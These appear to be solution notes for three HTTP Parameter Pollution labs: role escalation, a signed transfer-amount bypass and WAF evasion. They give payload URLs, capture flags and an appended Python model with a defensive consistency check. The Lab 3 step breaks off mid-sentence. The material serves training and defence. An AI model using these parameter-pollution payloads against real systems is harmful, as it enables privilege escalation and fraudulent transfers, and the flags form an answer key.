Lab 1 - HPP Auth Role Escalation:
1. Log in at /HPP/lab1.php with user / user.
2. URL: /HPP/lab1.php?role=user&role=admin
   Upstream validator reads the FIRST role (user) and allows the request.
   PHP backend reads the LAST role (admin) -> escalated.
   ?role=admin alone is blocked, so the duplicate param is required.
Flag: flag{hpp_duplicate_param_admin}

Lab 2 - Signed Request Bypass:
Intercept the POST in Burp. Add a second amount=9999 after amount=1.
The signature validates the first value (1) but the transfer uses the last (9999).
Flag: flag{hpp_signature_bypass_transfer}

Lab 3 - WAF Evasion:
URL: /HPP/lab3.php?search[]=alert(1)
The WAF checks each parameter individually. Split the
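Added example, not part of the lab notes: a small Python model of the parsing split behind Labs 1 and 2 (a validator that keeps the first occurrence of a key in front of a PHP-style backend whose $_GET keeps the last), together with the check a defender would put in front of both: refuse any query string the two would read differently, and flag array-style keys (name[]) that let one value be split up as in Lab 3. The query strings are taken from the labs; the two parser models and the check are constructed here.

```python
"""Model of the HTTP Parameter Pollution parsing split seen in the labs above."""
from urllib.parse import parse_qsl


def first_wins(query: str) -> dict:
    """Validator model (constructed): the first value of a repeated key wins."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        out.setdefault(key, value)
    return out


def last_wins(query: str) -> dict:
    """PHP $_GET / parse_str behaviour for scalar keys: the last value wins."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        out[key] = value
    return out


def pollution_findings(query: str) -> list:
    """Defensive check: report every repeated key (the two models may disagree)
    and every array-style key (name[]) that splits one parameter into pieces."""
    seen = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        seen.setdefault(key, []).append(value)
    findings = []
    for key, values in seen.items():
        if len(values) > 1:
            findings.append(
                f"{key}: repeated {len(values)}x, validator sees {values[0]!r}, "
                f"backend sees {values[-1]!r}"
            )
        if key.endswith("[]"):
            findings.append(f"{key}: array-style key with {len(values)} element(s)")
    return findings


def is_consistent(query: str) -> bool:
    """True only when validator and backend would read identical parameters."""
    return not pollution_findings(query)


if __name__ == "__main__":
    for q in ("role=user", "role=user&role=admin",
              "amount=1&amount=9999", "search[]=alert(1)"):
        print(q, "->", first_wins(q), last_wins(q), pollution_findings(q))
```

A signed-request endpoint like Lab 2 should sign and act on the same canonical form, which is what is_consistent enforces by rejecting the request before either side parses it.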